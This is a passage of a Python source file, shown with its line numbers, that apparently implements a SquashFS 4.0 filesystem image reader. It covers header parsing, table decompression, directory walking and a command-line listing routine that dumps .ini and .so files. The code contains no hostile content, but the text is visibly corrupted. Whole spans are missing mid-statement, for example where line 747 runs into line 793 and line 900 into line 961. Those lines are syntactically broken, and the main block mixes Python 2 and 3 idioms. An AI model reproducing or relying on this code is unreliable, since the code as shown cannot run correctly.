self.autoMakeBufInteger(buff,offset,4) 414 | self.fragment,offset = self.autoMakeBufInteger(buff,offset,4) 415 | self.offset,offset = self.autoMakeBufInteger(buff,offset,4) 416 | self.xattr,offset = self.autoMakeBufInteger(buff,offset,4) 417 | self.block_list,offset = self.autoMakeBufInteger(buff,offset,4) 418 | return offset 419 | 420 | def dir_header (self,buff,offset): 421 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 422 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 423 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 424 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 425 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 426 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 427 | self.start_block,offset = self.autoMakeBufInteger(buff,offset,4) 428 | self.nlink,offset = self.autoMakeBufInteger(buff,offset,4) 429 | self.file_size,offset = self.autoMakeBufInteger(buff,offset,2) 430 | self.offset,offset = self.autoMakeBufInteger(buff,offset,2) 431 | self.parent_inode,offset = self.autoMakeBufInteger(buff,offset,4) 432 | return offset 433 | 434 | def ldir_header (self,buff,offset): 435 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 436 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 437 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 438 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 439 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 440 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 441 | self.nlink,offset = self.autoMakeBufInteger(buff,offset,4) 442 | self.file_size,offset = self.autoMakeBufInteger(buff,offset,4) 443 | self.start_block,offset = self.autoMakeBufInteger(buff,offset,4) 444 | self.parent_inode,offset = self.autoMakeBufInteger(buff,offset,4) 445 | self.i_count,offset = self.autoMakeBufInteger(buff,offset,2) 446 | self.offset,offset = self.autoMakeBufInteger(buff,offset,2) 447 | self.xattr,offset = self.autoMakeBufInteger(buff,offset,4) 448 | self.index = buff[offset:] 449 | return offset 450 | 451 | 452 | class _Dir_entry(_Squashfs_commons): 453 | def __init__(self): 454 | self.offset=0 455 | self.inode_number=0 456 | self.type=0 457 | self.size=0 458 | self.name=[] 459 | self.s_file = None 460 | 461 | def fill(self,buffer,ofs): 462 | self.offset,ofs=self.autoMakeBufInteger(buffer,ofs,2) 463 | self.inode_number,ofs=self.autoMakeBufInteger(buffer,ofs,2) 464 | self.type,ofs=self.autoMakeBufInteger(buffer,ofs,2) 465 | self.size,ofs=self.autoMakeBufInteger(buffer,ofs,2) 466 | self.name=buffer[ofs:ofs+self.size] 467 | 468 | class _Dir_header(_Squashfs_commons): 469 | def __init__(self): 470 | self.count=0 471 | self.start_block=0 472 | self.inode_number=0 473 | def fill(self,buffer,ofs): 474 | self.count,ofs=self.autoMakeBufInteger(buffer,ofs,4) 475 | self.start_block,ofs=self.autoMakeBufInteger(buffer,ofs,4) 476 | self.inode_number,ofs=self.autoMakeBufInteger(buffer,ofs,4) 477 | 478 | class _Dir: 479 | def __init__(self): 480 | self.dir_count=0 481 | self.cur_entry=0 482 | self.mode=0 483 | self.uid=0 484 | self.guid=0 485 | self.mtime=0 486 | self.xattr=0 487 | self.dirs=[] 488 | 489 | class _Xattr_id(_Squashfs_commons): # 16 490 | def __init__(self): 491 | self.xattr = 0 492 | self.count = 0 493 | self.size = 0 494 | 495 | def fill(self,buffer,ofs): 496 | self.xattr,ofs=self.autoMakeBufInteger(buffer,ofs,8) 497 | self.count,ofs=self.autoMakeBufInteger(buffer,ofs,4) 498 | self.size,ofs=self.autoMakeBufInteger(buffer,ofs,4) 499 | 500 | class _Xattr_table(_Squashfs_commons): 501 | def __init__(self): 502 | self.xattr_table_start = 0 503 | self.xattr_ids = 0 504 | self.unused = 0 505 | 506 | def read(self,myfile): 507 | self.xattr_table_start = self.readLong(myfile) 508 | self.xattr_ids = self.readInt(myfile) 509 | self.unused = self.readInt(myfile) 510 | 511 | class SquashedFile(): 512 | def __init__(self, name, parent): 513 | self.name = name 514 | self.children = [] 515 | self.inode = None 516 | self.parent = parent 517 | 518 | def getPath(self) : 519 | if self.parent == None: 520 | return self.name 521 | else: 522 | return self.parent.getPath() + "/" + byt2str(self.name) 523 | 524 | def findAll(self): 525 | ret = [ self ] 526 | for i in self.children : 527 | ret += i.findAll() 528 | return ret 529 | 530 | def findAllPaths(self): 531 | ret = [ self.getPath() ] 532 | for i in self.children : 533 | ret += i.findAllPaths() 534 | return ret 535 | 536 | def getContent( self ): 537 | if self.inode==None: 538 | return None 539 | return self.inode.getContent() 540 | 541 | def read(self,path): 542 | node = self.select(path) 543 | if node==None: 544 | return None 545 | return node.getContent() 546 | 547 | def dirlist(self,path): 548 | node = self.select(path) 549 | if node==None: 550 | return None 551 | return node.children 552 | 553 | def select(self,path): 554 | if path == str2byt("/"): 555 | path = str2byt("") 556 | lpath = path.split(str2byt("/")) 557 | start = self 558 | ofs = 0 559 | if lpath[0] == str2byt(""): 560 | ofs = 1 561 | while start.parent!=None: 562 | start = start.parent 563 | if ofs>=len(lpath): 564 | return start 565 | for child in start.children : 566 | if child.name == lpath[ofs] : 567 | return child._lselect( lpath, ofs + 1 ) 568 | return None 569 | 570 | def _lselect(self, lpath, ofs ): 571 | #print lpath,self.name,ofs 572 | if ofs>=len(lpath): 573 | return self 574 | for child in self.children : 575 | if child.name == lpath[ofs] : 576 | return child._lselect( lpath, ofs+1 ) 577 | return None 578 | 579 | def hasAttribute(self,mask): 580 | if self.inode==None: 581 | return False 582 | return self.inode.hasAttribute(mask) 583 | 584 | def isFolder(self): 585 | if self.parent==None : 586 | return True 587 | return self.hasAttribute(stat.S_IFDIR) 588 | 589 | def close(self): 590 | self.inode.image.close() 591 | def getLength(self): 592 | return self.inode.data 593 | 594 | def getName(self): 595 | return self.name 596 | 597 | 598 | class SquashFsImage(_Squashfs_commons): 599 | def __init__(self,filepath=None,offset=None): 600 | self.comp = None 601 | self.sBlk = _Squashfs_super_block() 602 | self.fragment_buffer_size = FRAGMENT_BUFFER_DEFAULT 603 | self.data_buffer_size = DATA_BUFFER_DEFAULT 604 | self.block_size = 0 605 | self.block_log = 0 606 | self.all_buffers_size = 0 607 | self.fragment_table = [] 608 | self.id_table = 0 609 | self.inode_table_hash = {} 610 | self.inode_table = str2byt("") 611 | self.id_table = [] 612 | self.hash_table = {} 613 | self.xattrs = b"" 614 | self.directory_table_hash={} 615 | self.created_inode = [] 616 | self.total_blocks = 0 617 | self.total_files = 0 618 | self.total_inodes = 0 619 | self.directory_table = str2byt('') 620 | self.inode_to_file = {} 621 | self.root = SquashedFile("",None) 622 | self.image_file = None 623 | self.offset = int(offset) if offset else 0 624 | if( filepath!=None ): 625 | self.open(filepath) 626 | 627 | def getRoot(self): 628 | return self.root 629 | 630 | def setFile(self,fd): 631 | self.image_file=fd 632 | fd.seek(self.offset) 633 | self.initialize(self.image_file) 634 | 635 | def open(self,filepath): 636 | self.image_file = open(filepath,'rb') 637 | self.image_file.seek(self.offset) 638 | self.initialize(self.image_file) 639 | 640 | def close(self): 641 | self.image_file.close() 642 | 643 | def __read_super(self,fd): 644 | self.sBlk.read(fd) 645 | if self.sBlk.s_magic != SQUASHFS_MAGIC or self.sBlk.s_major != 4 or self.sBlk.s_minor != 0: 646 | raise IOError("The file supplied is not a squashfs 4.0 image") 647 | self.comp = self.getCompressor(self.sBlk.compression) 648 | 649 | def getCompressor(self,compression_id): 650 | for c in _compressors : 651 | if c.supported == compression_id : 652 | return c 653 | raise ValueError( "Unknown compression method "+compression_id ) 654 | 655 | def initialize(self,myfile): 656 | self.__read_super(myfile) 657 | self.created_inode = [ None for i in range(0,self.sBlk.inodes) ] 658 | self.block_size = self.sBlk.block_size 659 | self.block_log = self.sBlk.block_log 660 | self.fragment_buffer_size <<= 20 - self.block_log 661 | self.data_buffer_size <<= 20 - self.block_log 662 | self.all_buffers_size = self.fragment_buffer_size + self.data_buffer_size 663 | self.read_uids_guids(myfile) 664 | self.read_fragment_table(myfile) 665 | self.uncompress_inode_table(myfile,self.sBlk.inode_table_start,self.sBlk.directory_table_start) 666 | self.uncompress_directory_table(myfile,self.sBlk.directory_table_start,self.sBlk.fragment_table_start) 667 | self.read_xattrs_from_disk(myfile) 668 | root_block = SQUASHFS_INODE_BLK (self.sBlk.root_inode) 669 | root_offs = SQUASHFS_INODE_OFFSET(self.sBlk.root_inode) 670 | self.pre_scan("squashfs-root",root_block,root_offs, self.root) 671 | 672 | def read_data_block(self, myfile, start, size): 673 | c_byte = SQUASHFS_COMPRESSED_SIZE_BLOCK(size) 674 | myfile.seek(self.offset + start) 675 | data = myfile.read(c_byte) 676 | if(SQUASHFS_COMPRESSED_BLOCK(size)) : 677 | return self.comp.uncompress(data) 678 | else : 679 | return data 680 | 681 | def getFileContent(self,inode): 682 | start = inode.start 683 | content = str2byt("") 684 | block_list = self.read_block_list(inode) 685 | for cur_blk in block_list : 686 | if cur_blk == SQUASHFS_INVALID_FRAG: 687 | continue 688 | c_byte = SQUASHFS_COMPRESSED_SIZE_BLOCK(cur_blk) 689 | if cur_blk != 0: # non sparse file 690 | buffer = self.read_data_block(self.image_file,start,cur_blk) 691 | content +=buffer 692 | start += c_byte 693 | if inode.frag_bytes !=0 : 694 | start, size = self.read_fragment(inode.fragment) 695 | buffer = self.read_data_block(self.image_file,start,size) 696 | content += buffer[inode.offset:inode.offset+inode.frag_bytes] # inode.frag_bytes was (inode.data%self.block_size) 697 | return content 698 | 699 | def read_block_list(self,inode): 700 | ret = [] 701 | ofs = inode.block_ptr 702 | for i in range(0,inode.blocks): 703 | number,ofs = self.autoMakeBufInteger(self.inode_table,ofs,4) 704 | ret.append(number) 705 | return ret 706 | 707 | def read_block(self,myfile,start): 708 | myfile.seek(self.offset + start,0) 709 | c_byte = self.readShort(myfile) 710 | offset = 2 711 | if SQUASHFS_CHECK_DATA(self.sBlk.flags) : 712 | offset = 3 713 | if SQUASHFS_COMPRESSED(c_byte) : 714 | myfile.seek(self.offset + start + offset) 715 | c_byte = SQUASHFS_COMPRESSED_SIZE(c_byte) 716 | buffer = myfile.read(c_byte) 717 | block = self.comp.uncompress(buffer) 718 | return (block,start + offset + c_byte, c_byte) 719 | else: 720 | myfile.seek(self.offset + start + offset) 721 | c_byte = SQUASHFS_COMPRESSED_SIZE(c_byte) 722 | block = myfile.read(c_byte) 723 | return (block, start + offset + c_byte, c_byte) 724 | 725 | def uncompress_inode_table(self,myfile,start,end): 726 | bytes = 0 727 | while start < end : 728 | self.inode_table_hash[start] = bytes 729 | block,start,res = self.read_block(myfile, start) 730 | self.inode_table += block 731 | bytes=len(self.inode_table) 732 | 733 | def read_fragment_table(self,myfile): 734 | indexes = SQUASHFS_FRAGMENT_INDEXES(self.sBlk.fragments) 735 | fragment_table_index = [None for i in range(0,indexes)] 736 | self.fragment_table = [] 737 | if self.sBlk.fragments == 0: 738 | return True 739 | myfile.seek(self.offset + self.sBlk.fragment_table_start) 740 | for i in range(0,indexes) : 741 | fragment_table_index[i] = self.readLong(myfile) 742 | table = str2byt("") 743 | for i in range(0,indexes): 744 | block = self.read_block(myfile, fragment_table_index[i])[0] 745 | table += block 746 | ofs = 0 747 | while ofs> self.sBlk.block_log 793 | else: 794 | i.blocks = i.data >> self.sBlk.block_log 795 | i.start = header.start_block 796 | i.sparse = 0 797 | #i.block_ptr = block_ptr + 32 #sizeof(*inode) 798 | i.xattr = SQUASHFS_INVALID_XATTR 799 | elif header.inode_type==SQUASHFS_LREG_TYPE: 800 | i.block_ptr = header.lreg_header(self.inode_table,block_ptr) 801 | i.data = header.file_size 802 | if header.fragment == SQUASHFS_INVALID_FRAG: 803 | i.frag_bytes = 0 804 | else: 805 | i.frag_bytes = header.file_size % self.sBlk.block_size 806 | i.fragment = header.fragment 807 | i.offset = header.offset 808 | if header.fragment == SQUASHFS_INVALID_FRAG: 809 | i.blocks = (header.file_size + self.sBlk.block_size - 1) >> self.sBlk.block_log 810 | else: 811 | i.blocks = header.file_size >> self.sBlk.block_log 812 | i.start = header.start_block 813 | i.sparse = header.sparse != 0 814 | #i.block_ptr = block_ptr + 60#sizeof(*inode) 815 | i.xattr = header.xattr 816 | elif header.inode_type==SQUASHFS_SYMLINK_TYPE or header.inode_type==SQUASHFS_LSYMLINK_TYPE: 817 | header.symlink_header(self.inode_table,block_ptr) 818 | i.symlink = self.inode_table[block_ptr+24:block_ptr+24+header.symlink_size+1] 819 | i.symlink[header.symlink_size] = '\0' 820 | i.data = header.symlink_size 821 | if header.inode_type == SQUASHFS_LSYMLINK_TYPE: 822 | i.xattr = self.makeBufInteger(self.inode_table,block_ptr + 24 + header.symlink_size, 4) 823 | else: 824 | i.xattr = SQUASHFS_INVALID_XATTR 825 | elif header.inode_type==SQUASHFS_BLKDEV_TYPE or header.inode_type==SQUASHFS_CHRDEV_TYPE: 826 | header.dev_header(self.inode_table,block_ptr) 827 | i.data = header.rdev 828 | i.xattr = SQUASHFS_INVALID_XATTR 829 | elif header.inode_type==SQUASHFS_LBLKDEV_TYPE or header.inode_type==SQUASHFS_LCHRDEV_TYPE: 830 | header.ldev_header(self.inode_table,block_ptr) 831 | i.data = header.rdev 832 | i.xattr = header.xattr 833 | elif header.inode_type==SQUASHFS_FIFO_TYPE or header.inode_type==SQUASHFS_SOCKET_TYPE: 834 | i.data = 0 835 | i.xattr = SQUASHFS_INVALID_XATTR 836 | elif header.inode_type==SQUASHFS_LFIFO_TYPE or header.inode_type==SQUASHFS_LSOCKET_TYPE: 837 | header.lipc_header(self.inode_table,block_ptr) 838 | i.data = 0 839 | i.xattr = header.xattr 840 | else: 841 | raise RuntimeError("Unknown inode type %d in read_inode!\n" % header.inode_type) 842 | return i 843 | 844 | def uncompress_directory_table(self,myfile,start,end): 845 | size = 0 846 | while start < end : 847 | self.directory_table_hash[start]=len(self.directory_table) 848 | block,start,byte_count = self.read_block(myfile, start) 849 | self.directory_table += block 850 | 851 | def squashfs_opendir(self,block_start,offset, s_file): 852 | i = self.read_inode(block_start, offset) 853 | start = self.sBlk.directory_table_start + i.start 854 | bytes = self.directory_table_hash[ start ] 855 | bytes += i.offset 856 | size = i.data + bytes - 3 857 | self.inode_to_file[i.inode_number] = s_file 858 | s_file.inode = i 859 | mydir = _Dir() 860 | mydir.dir_count = 0 861 | mydir.cur_entry = 0 862 | mydir.mode = i.mode 863 | mydir.uid = i.uid 864 | mydir.guid = i.gid 865 | mydir.mtime = i.time 866 | mydir.xattr = i.xattr 867 | mydir.dirs = [] 868 | dirh = _Dir_header() 869 | while bytes < size : 870 | dirh.fill(self.directory_table,bytes) 871 | dir_count = dirh.count + 1 872 | bytes+=12 873 | while dir_count!=0 : 874 | dire = _Dir_entry() 875 | dir_count-=1 876 | dire.fill(self.directory_table , bytes ) 877 | bytes += 8 878 | dire.name= self.directory_table[ bytes:bytes+dire.size + 1] 879 | dire.s_file = SquashedFile(dire.name, s_file) 880 | s_file.children.append(dire.s_file) 881 | dire.parent = mydir 882 | dire.start_block = dirh.start_block 883 | mydir.dirs.append(dire) 884 | mydir.dir_count += 1 885 | bytes += dire.size + 1 886 | return (mydir,i) 887 | 888 | def read_uids_guids(self,myfile): 889 | indexes = SQUASHFS_ID_BLOCKS(self.sBlk.no_ids) 890 | id_index_table = [ None for i in range(0,indexes) ] 891 | self.id_table = [ None for i in range(0,self.sBlk.no_ids) ] 892 | myfile.seek(self.offset + self.sBlk.id_table_start,0) 893 | for i in range(0,indexes): 894 | id_index_table[i] = self.makeInteger(myfile,SQUASHFS_ID_BLOCK_BYTES(1)) 895 | for i in range(0,indexes) : 896 | myfile.seek(self.offset + id_index_table[i]) 897 | block,next,bytes = self.read_block(myfile, id_index_table[i]) 898 | offset = 0 899 | index = i * (SQUASHFS_METADATA_SIZE // 4) 900 | while offset> self.block_log 961 | self.total_files +=1 962 | self.total_inodes +=1 963 | self.inode_to_file[i.inode_number] = dir_entry.s_file 964 | dir_entry.s_file.inode = i 965 | return mydir 966 | 967 | 968 | if __name__=="__main__": 969 | import sys 970 | image = SquashFsImage(sys.argv[1]) 971 | if len(sys.argv)>1 : 972 | for i in range(2,len(sys.argv)): 973 | sqashed_filename = sys.argv[i] 974 | squashed_file = image.root.select(sqashed_filename) 975 | print("--------------%-50.50s --------------" % sqashed_filename) 976 | if squashed_file==None: 977 | print("NOT FOUND") 978 | elif squashed_file.isFolder(): 979 | print("FOLDER " + squashed_file.getPath()) 980 | for child in squashed_file.children: 981 | if child.isFolder(): 982 | print("\t%-20s " % child.name) 983 | else: 984 | print("\t%-20s %s" % (child.name,child.inode.data)) 985 | else: 986 | print(squashed_file.getContent()) 987 | else: 988 | for i in image.root.findAll(): 989 | nodetype = "FILE " 990 | if i.isFolder(): 991 | nodetype = "FOLDER" 992 | print(nodetype + ' ' + i.getPath() + " inode=" + i.inode.inode_number + " (" + image.read_block_list(i.inode) + " + " + i.inode.offset + ")") 993 | 994 | for i in image.root.findAll() : 995 | if i.name.endswith(".ini") : 996 | content = i.getContent() 997 | print("==============%-50.50s (%8d)==============" % (i.getPath(), len(content))) 998 | print(content) 999 | elif i.name.endswith(".so") : 1000 | content = i.getContent() 1001 | print("++++++++++++++%-50.50s (%8d)++++++++++++++" % (i.getPath(), len(content))) 1002 | oname = i.name+"_saved_"+str(i.inode.inode_number) 1003 | print("written %s from %s %d" % (oname, i.name, len(content))) 1004 | of = file( oname , "wb" ) 1005 | of.write( content ) 1006 | of.close() 1007 | image.close() 1008 | 1009 | --------------------------------------------------------------------------------